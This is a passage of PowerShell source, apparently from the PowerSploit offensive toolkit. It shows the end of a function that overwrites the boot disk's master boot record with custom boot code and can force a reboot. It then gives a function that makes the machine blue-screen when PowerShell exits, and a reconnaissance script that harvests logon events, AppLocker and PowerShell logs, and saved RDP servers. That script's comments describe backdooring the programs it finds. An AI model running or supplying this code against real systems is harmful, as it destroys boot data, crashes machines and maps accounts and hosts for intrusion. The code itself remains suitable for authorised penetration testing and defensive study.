$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
$TypeBuilder = $ModuleBuilder.DefineType('Win32.Kernel32', 'Public, Class')
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor,
@('kernel32.dll'),
[Reflection.FieldInfo[]]@($SetLastError),
@($True))
# Define [Win32.Kernel32]::DeviceIoControl
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('DeviceIoControl',
'kernel32.dll',
([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
[Reflection.CallingConventions]::Standard,
[Bool],
[Type[]]@([IntPtr], [UInt32], [IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32].MakeByRefType(), [IntPtr]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
# Define [Win32.Kernel32]::CreateFile
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CreateFile',
'kernel32.dll',
([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
[Reflection.CallingConventions]::Standard,
[IntPtr],
[Type[]]@([String], [Int32], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Ansi)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
# Define [Win32.Kernel32]::WriteFile
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('WriteFile',
'kernel32.dll',
([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
[Reflection.CallingConventions]::Standard,
[Bool],
[Type[]]@([IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType(), [IntPtr]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Ansi)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
# Define [Win32.Kernel32]::CloseHandle
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CloseHandle',
'kernel32.dll',
([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
[Reflection.CallingConventions]::Standard,
[Bool],
[Type[]]@([IntPtr]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$Kernel32 = $TypeBuilder.CreateType()
#endregion
$LengthBytes = [BitConverter]::GetBytes(([Int16] ($BootMessage.Length + 5)))
# Convert the boot message to a byte array
$MessageBytes = [Text.Encoding]::ASCII.GetBytes(('PS > ' + $BootMessage))
[Byte[]] $MBRInfectionCode = @(
0xb8, 0x12, 0x00, # MOV AX, 0x0012 ; CMD: Set video mode, ARG: text resolution 80x30, pixel resolution 640x480, colors 16/256K, VGA
0xcd, 0x10, # INT 0x10 ; BIOS interrupt call - Set video mode
0xb8, 0x00, 0x0B, # MOV AX, 0x0B00 ; CMD: Set background color
0xbb, 0x01, 0x00, # MOV BX, 0x000F ; Background color: Blue
0xcd, 0x10, # INT 0x10 ; BIOS interrupt call - Set background color
0xbd, 0x20, 0x7c, # MOV BP, 0x7C18 ; Offset to string: 0x7C00 (base of MBR code) + 0x20
0xb9) + $LengthBytes + @( # MOV CX, 0x0018 ; String length
0xb8, 0x01, 0x13, # MOV AX, 0x1301 ; CMD: Write string, ARG: Assign BL attribute (color) to all characters
0xbb, 0x0f, 0x00, # MOV BX, 0x000F ; Page Num: 0, Color: White
0xba, 0x00, 0x00, # MOV DX, 0x0000 ; Row: 0, Column: 0
0xcd, 0x10, # INT 0x10 ; BIOS interrupt call - Write string
0xe2, 0xfe # LOOP 0x16 ; Print all characters to the buffer
) + $MessageBytes
$MBRSize = [UInt32] 512
if ($MBRInfectionCode.Length -gt ($MBRSize - 2))
{
throw "The size of the MBR infection code cannot exceed $($MBRSize - 2) bytes."
}
# Allocate 512 bytes for the MBR
$MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)
# Zero-initialize the allocated unmanaged memory
0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
[Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)
# Write boot record signature to the end of the MBR
[Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, ($MBRSize - 2)), 0x55)
[Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, ($MBRSize - 1)), 0xAA)
# Get the device ID of the boot disk
$DeviceID = Get-WmiObject -Class Win32_DiskDrive -Filter 'Index = 0' | Select-Object -ExpandProperty DeviceID
$GENERIC_READWRITE = 0x80000000 -bor 0x40000000
$FILE_SHARE_READWRITE = 2 -bor 1
$OPEN_EXISTING = 3
# Obtain a read handle to the raw disk
$DriveHandle = $Kernel32::CreateFile($DeviceID, $GENERIC_READWRITE, $FILE_SHARE_READWRITE, 0, $OPEN_EXISTING, 0, 0)
if ($DriveHandle -eq ([IntPtr] 0xFFFFFFFF))
{
throw "Unable to obtain read/write handle to $DeviceID"
}
$BytesReturned = [UInt32] 0
$BytesWritten = [UInt32] 0
$FSCTL_LOCK_VOLUME = 0x00090018
$FSCTL_UNLOCK_VOLUME = 0x0009001C
$null = $Kernel32::DeviceIoControl($DriveHandle, $FSCTL_LOCK_VOLUME, 0, 0, 0, 0, [Ref] $BytesReturned, 0)
$null = $Kernel32::WriteFile($DriveHandle, $MBRBytes, $MBRSize, [Ref] $BytesWritten, 0)
$null = $Kernel32::DeviceIoControl($DriveHandle, $FSCTL_UNLOCK_VOLUME, 0, 0, 0, 0, [Ref] $BytesReturned, 0)
$null = $Kernel32::CloseHandle($DriveHandle)
Start-Sleep -Seconds 2
[Runtime.InteropServices.Marshal]::FreeHGlobal($MBRBytes)
Write-Verbose 'Master boot record overwritten successfully.'
if ($RebootImmediately)
{
Restart-Computer -Force
}
}
function Set-CriticalProcess
{
<#
.SYNOPSIS
Causes your machine to blue screen upon exiting PowerShell.
PowerSploit Function: Set-CriticalProcess
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER ExitImmediately
Immediately exit PowerShell after successfully marking the process as critical.
.PARAMETER Force
Set the running PowerShell process as critical without asking for confirmation.
.EXAMPLE
Set-CriticalProcess
.EXAMPLE
Set-CriticalProcess -ExitImmediately
.EXAMPLE
Set-CriticalProcess -Force -Verbose
#>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
[Switch]
$Force,
[Switch]
$ExitImmediately
)
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
{
throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'
}
$Response = $True
if (!$Force)
{
$Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
}
if (!$Response)
{
return
}
$DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)
# Define [ntdll]::NtQuerySystemInformation method
$TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',
'ntdll.dll',
([Reflection.MethodAttributes] 'Public, Static'),
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$ntdll = $TypeBuilder.CreateType()
$ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle
$ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)
$ProcessBreakOnTermination = 29
$SizeUInt32 = 4
try
{
$null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)
}
catch
{
return
}
Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'
if ($ExitImmediately)
{
Stop-Process -Id $PID
}
}

580
Recon/Get-ComputerDetails.ps1
View File

@ -0,0 +1,580 @@
function Get-ComputerDetails
{
<#
.SYNOPSIS
This script is used to get useful information from a computer.
Function: Get-ComputerDetails
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
.DESCRIPTION
This script is used to get useful information from a computer. Currently, the script gets the following information:
-Explicit Credential Logons (Event ID 4648)
-Logon events (Event ID 4624)
-AppLocker logs to find what processes are created
-PowerShell logs to find PowerShell scripts which have been executed
-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to
.PARAMETER ToString
Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.
.EXAMPLE
Get-ComputerDetails
Gets information about the computer and outputs it as PowerShell objects.
Get-ComputerDetails -ToString
Gets information about the computer and outputs it as raw text.
.NOTES
This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
.LINK
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
Param(
[Parameter(Position=0)]
[Switch]
$ToString
)
Set-StrictMode -Version 2
$SecurityLog = Get-EventLog -LogName Security
$Filtered4624 = Find-4624Logons $SecurityLog
$Filtered4648 = Find-4648Logons $SecurityLog
$AppLockerLogs = Find-AppLockerLogs
$PSLogs = Find-PSScriptsInPSAppLog
$RdpClientData = Find-RDPClientConnections
if ($ToString)
{
Write-Output "Event ID 4624 (Logon):"
Write-Output $Filtered4624.Values | Format-List
Write-Output "Event ID 4648 (Explicit Credential Logon):"
Write-Output $Filtered4648.Values | Format-List
Write-Output "AppLocker Process Starts:"
Write-Output $AppLockerLogs.Values | Format-List
Write-Output "PowerShell Script Executions:"
Write-Output $PSLogs.Values | Format-List
Write-Output "RDP Client Data:"
Write-Output $RdpClientData.Values | Format-List
}
else
{
$Properties = @{
LogonEvent4624 = $Filtered4624.Values
LogonEvent4648 = $Filtered4648.Values
AppLockerProcessStart = $AppLockerLogs.Values
PowerShellScriptStart = $PSLogs.Values
RdpClientData = $RdpClientData.Values
}
$ReturnObj = New-Object PSObject -Property $Properties
return $ReturnObj
}
}
function Find-4648Logons
{
<#
.SYNOPSIS
Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
Function: Find-4648Logons
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
.DESCRIPTION
Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
.EXAMPLE
Find-4648Logons
Gets the unique 4648 logon events.
.NOTES
.LINK
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
Param(
$SecurityLog
)
$ExplicitLogons = $SecurityLog | Where {$_.InstanceID -eq 4648}
$ReturnInfo = @{}
foreach ($ExplicitLogon in $ExplicitLogons)
{
$Subject = $false
$AccountWhosCredsUsed = $false
$TargetServer = $false
$SourceAccountName = ""
$SourceAccountDomain = ""
$TargetAccountName = ""
$TargetAccountDomain = ""
$TargetServer = ""
foreach ($line in $ExplicitLogon.Message -split "\r\n")
{
if ($line -cmatch "^Subject:$")
{
$Subject = $true
}
elseif ($line -cmatch "^Account\sWhose\sCredentials\sWere\sUsed:$")
{
$Subject = $false
$AccountWhosCredsUsed = $true
}
elseif ($line -cmatch "^Target\sServer:")
{
$AccountWhosCredsUsed = $false
$TargetServer = $true
}
elseif ($Subject -eq $true)
{
if ($line -cmatch "\s+Account\sName:\s+(\S.*)")
{
$SourceAccountName = $Matches[1]
}
elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)")
{
$SourceAccountDomain = $Matches[1]
}
}
elseif ($AccountWhosCredsUsed -eq $true)
{
if ($line -cmatch "\s+Account\sName:\s+(\S.*)")
{
$TargetAccountName = $Matches[1]
}
elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)")
{
$TargetAccountDomain = $Matches[1]
}
}
elseif ($TargetServer -eq $true)
{
if ($line -cmatch "\s+Target\sServer\sName:\s+(\S.*)")
{
$TargetServer = $Matches[1]
}
}
}
#Filter out logins that don't matter
if (-not ($TargetAccountName -cmatch "^DWM-.*" -and $TargetAccountDomain -cmatch "^Window\sManager$"))
{
$Key = $SourceAccountName + $SourceAccountDomain + $TargetAccountName + $TargetAccountDomain + $TargetServer
if (-not $ReturnInfo.ContainsKey($Key))
{
$Properties = @{
LogType = 4648
LogSource = "Security"
SourceAccountName = $SourceAccountName
SourceDomainName = $SourceAccountDomain
TargetAccountName = $TargetAccountName
TargetDomainName = $TargetAccountDomain
TargetServer = $TargetServer
Count = 1
Times = @($ExplicitLogon.TimeGenerated)
}
$ResultObj = New-Object PSObject -Property $Properties
$ReturnInfo.Add($Key, $ResultObj)
}
else
{
$ReturnInfo[$Key].Count++
$ReturnInfo[$Key].Times += ,$ExplicitLogon.TimeGenerated
}
}
}
return $ReturnInfo
}
function Find-4624Logons
{
<#
.SYNOPSIS
Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do
network logons in to the server, what accounts RDP in, what accounts log in locally, etc...
Function: Find-4624Logons
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
.DESCRIPTION
Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do
network logons in to the server, what accounts RDP in, what accounts log in locally, etc...
.EXAMPLE
Find-4624Logons
Find unique 4624 logon events.
.NOTES
.LINK
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
Param (
$SecurityLog
)
$Logons = $SecurityLog | Where {$_.InstanceID -eq 4624}
$ReturnInfo = @{}
foreach ($Logon in $Logons)
{
$SubjectSection = $false
$NewLogonSection = $false
$NetworkInformationSection = $false
$AccountName = ""
$AccountDomain = ""
$LogonType = ""
$NewLogonAccountName = ""
$NewLogonAccountDomain = ""
$WorkstationName = ""
$SourceNetworkAddress = ""
$SourcePort = ""
foreach ($line in $Logon.Message -Split "\r\n")
{
if ($line -cmatch "^Subject:$")
{
$SubjectSection = $true
}
elseif ($line -cmatch "^Logon\sType:\s+(\S.*)")
{
$LogonType = $Matches[1]
}
elseif ($line -cmatch "^New\sLogon:$")
{
$SubjectSection = $false
$NewLogonSection = $true
}
elseif ($line -cmatch "^Network\sInformation:$")
{
$NewLogonSection = $false
$NetworkInformationSection = $true
}
elseif ($SubjectSection)
{
if ($line -cmatch "^\s+Account\sName:\s+(\S.*)")
{
$AccountName = $Matches[1]
}
elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)")
{
$AccountDomain = $Matches[1]
}
}
elseif ($NewLogonSection)
{
if ($line -cmatch "^\s+Account\sName:\s+(\S.*)")
{
$NewLogonAccountName = $Matches[1]
}
elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)")
{
$NewLogonAccountDomain = $Matches[1]
}
}
elseif ($NetworkInformationSection)
{
if ($line -cmatch "^\s+Workstation\sName:\s+(\S.*)")
{
$WorkstationName = $Matches[1]
}
elseif ($line -cmatch "^\s+Source\sNetwork\sAddress:\s+(\S.*)")
{
$SourceNetworkAddress = $Matches[1]
}
elseif ($line -cmatch "^\s+Source\sPort:\s+(\S.*)")
{
$SourcePort = $Matches[1]
}
}
}
#Filter out logins that don't matter
if (-not ($NewLogonAccountDomain -cmatch "NT\sAUTHORITY" -or $NewLogonAccountDomain -cmatch "Window\sManager"))
{
$Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort
if (-not $ReturnInfo.ContainsKey($Key))
{
$Properties = @{
LogType = 4624
LogSource = "Security"
SourceAccountName = $AccountName
SourceDomainName = $AccountDomain
NewLogonAccountName = $NewLogonAccountName
NewLogonAccountDomain = $NewLogonAccountDomain
LogonType = $LogonType
WorkstationName = $WorkstationName
SourceNetworkAddress = $SourceNetworkAddress
SourcePort = $SourcePort
Count = 1
Times = @($Logon.TimeGenerated)
}
$ResultObj = New-Object PSObject -Property $Properties
$ReturnInfo.Add($Key, $ResultObj)
}
else
{
$ReturnInfo[$Key].Count++
$ReturnInfo[$Key].Times += ,$Logon.TimeGenerated
}
}
}
return $ReturnInfo
}
function Find-AppLockerLogs
{
<#
.SYNOPSIS
Look through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run).
Function: Find-AppLockerLogs
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
.DESCRIPTION
Look through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run).
.EXAMPLE
Find-AppLockerLogs
Find process creations from AppLocker logs.
.NOTES
.LINK
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
$ReturnInfo = @{}
$AppLockerLogs = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where {$_.Id -eq 8002}
foreach ($Log in $AppLockerLogs)
{
$SID = New-Object System.Security.Principal.SecurityIdentifier($Log.Properties[7].Value)
$UserName = $SID.Translate( [System.Security.Principal.NTAccount])
$ExeName = $Log.Properties[10].Value
$Key = $UserName.ToString() + "::::" + $ExeName
if (!$ReturnInfo.ContainsKey($Key))
{
$Properties = @{
Exe = $ExeName
User = $UserName.Value
Count = 1
Times = @($Log.TimeCreated)
}
$Item = New-Object PSObject -Property $Properties
$ReturnInfo.Add($Key, $Item)
}
else
{
$ReturnInfo[$Key].Count++
$ReturnInfo[$Key].Times += ,$Log.TimeCreated
}
}
return $ReturnInfo
}
Function Find-PSScriptsInPSAppLog
{
<#
.SYNOPSIS
Go through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log).
You can then backdoor these scripts or do other malicious things.
Function: Find-AppLockerLogs
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
.DESCRIPTION
Go through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log).
You can then backdoor these scripts or do other malicious things.
.EXAMPLE
Find-PSScriptsInPSAppLog
Find unique PowerShell scripts being executed from the PowerShell operational log.
.NOTES
.LINK
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
$ReturnInfo = @{}
$Logs = Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where {$_.Id -eq 4100}
foreach ($Log in $Logs)
{
$ContainsScriptName = $false
$LogDetails = $Log.Message -split "`r`n"
$FoundScriptName = $false
foreach($Line in $LogDetails)
{
if ($Line -imatch "^\s*Script\sName\s=\s(.+)")
{
$ScriptName = $Matches[1]
$FoundScriptName = $true
}
elseif ($Line -imatch "^\s*User\s=\s(.*)")
{
$User = $Matches[1]
}
}
if ($FoundScriptName)
{
$Key = $ScriptName + "::::" + $User
if (!$ReturnInfo.ContainsKey($Key))
{
$Properties = @{
ScriptName = $ScriptName
UserName = $User
Count = 1
Times = @($Log.TimeCreated)
}
$Item = New-Object PSObject -Property $Properties
$ReturnInfo.Add($Key, $Item)
}
else
{
$ReturnInfo[$Key].Count++
$ReturnInfo[$Key].Times += ,$Log.TimeCreated
}
}
}
return $ReturnInfo
}
Function Find-RDPClientConnections
{
<#
.SYNOPSIS
Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user
usually RDP's to.
Function: Find-RDPClientConnections
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
.DESCRIPTION
Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user
usually RDP's to.
.EXAMPLE
Find-RDPClientConnections
Find unique saved RDP client connections.
.NOTES
.LINK
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
$ReturnInfo = @{}
New-PSDrive -Name HKU -PSProvider Registry -Root Registry::HKEY_USERS | Out-Null
#Attempt to enumerate the servers for all users
$Users = Get-ChildItem -Path "HKU:\"
foreach ($UserSid in $Users.PSChildName)
{
$Servers = Get-ChildItem "HKU:\$($UserSid)\Software\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue
foreach ($Server in $Servers)
{
$Server = $Server.PSChildName
$UsernameHint = (Get-ItemProperty -Path "HKU:\$($UserSid)\Software\Microsoft\Terminal Server Client\Servers\$($Server)").UsernameHint
$Key = $UserSid + "::::" + $Server + "::::" + $UsernameHint
if (!$ReturnInfo.ContainsKey($Key))
{
$SIDObj = New-Object System.Security.Principal.SecurityIdentifier($UserSid)
$User = ($SIDObj.Translate([System.Security.Principal.NTAccount])).Value
$Properties = @{
CurrentUser = $User
Server = $Server
UsernameHint = $UsernameHint
}
$Item = New-Object PSObject -Property $Properties
$ReturnInfo.Add($Key, $Item)
}
}
}
return $ReturnInfo
}